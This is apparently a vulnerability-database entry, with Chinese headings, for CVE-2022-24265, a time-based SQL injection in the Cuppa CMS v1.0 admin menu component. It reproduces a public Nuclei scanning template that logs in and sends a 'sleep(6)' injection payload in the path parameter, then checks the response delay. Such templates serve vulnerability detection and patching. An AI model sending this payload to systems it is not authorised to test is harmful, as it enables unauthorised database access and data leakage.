CVE-2022-24265: Cuppa CMS v1.0 - SQL injection

日期: 2025-08-01 | 影响软件: Cuppa CMS | POC: 已公开

漏洞描述

Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/menu/ via the path=component/menu/&menu_filter=3 parameter.

PoC代码[已公开]

id: CVE-2022-24265

info:
  name: Cuppa CMS v1.0 - SQL injection
  author: theamanrawat
  severity: high
  description: |
    Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/menu/ via the path=component/menu/&menu_filter=3 parameter.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire CMS system.
  remediation: |
    Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the SQL injection vulnerability.
  reference:
    - https://github.com/CuppaCMS/CuppaCMS
    - https://nvd.nist.gov/vuln/detail/CVE-2022-24265
    - https://github.com/truonghuuphuc/CVE
    - https://github.com/Nguyen-Trung-Kien/CVE-1
    - https://github.com/oxf5/CVE
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-24265
    cwe-id: CWE-89
    epss-score: 0.59388
    epss-percentile: 0.98185
    cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: cuppacms
    product: cuppacms
  tags: time-based-sqli,cve2022,cve,sqli,cuppa,authenticated,cuppacms

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user={{username}}&password={{password}}&language=en&task=login
      - |
        @timeout: 20s
        POST /components/menu/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        path=component%2Fmenu%2F%26menu_filter%3D3'+and+sleep(6)--+-&data_get=eyJtZW51X2ZpbHRlciI6IjMifQ%3D%3D&uniqueClass=wrapper_content_906185

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code_2 == 200'
          - 'contains(content_type_2, "text/html")'
          - 'contains(body_2, "menu/html/edit.php")'
        condition: and
# digest: 4a0a00473045022100fe781f52f6251459a7c8505c27231abb1d9460a62f81a28c2c4d9dc172c31acf02206c67c4f236e409ae528992d952e0403bf82a491bdf01900be5cc103d8431a70c:922c64590222798bb761d5b6d8e72950

相关漏洞推荐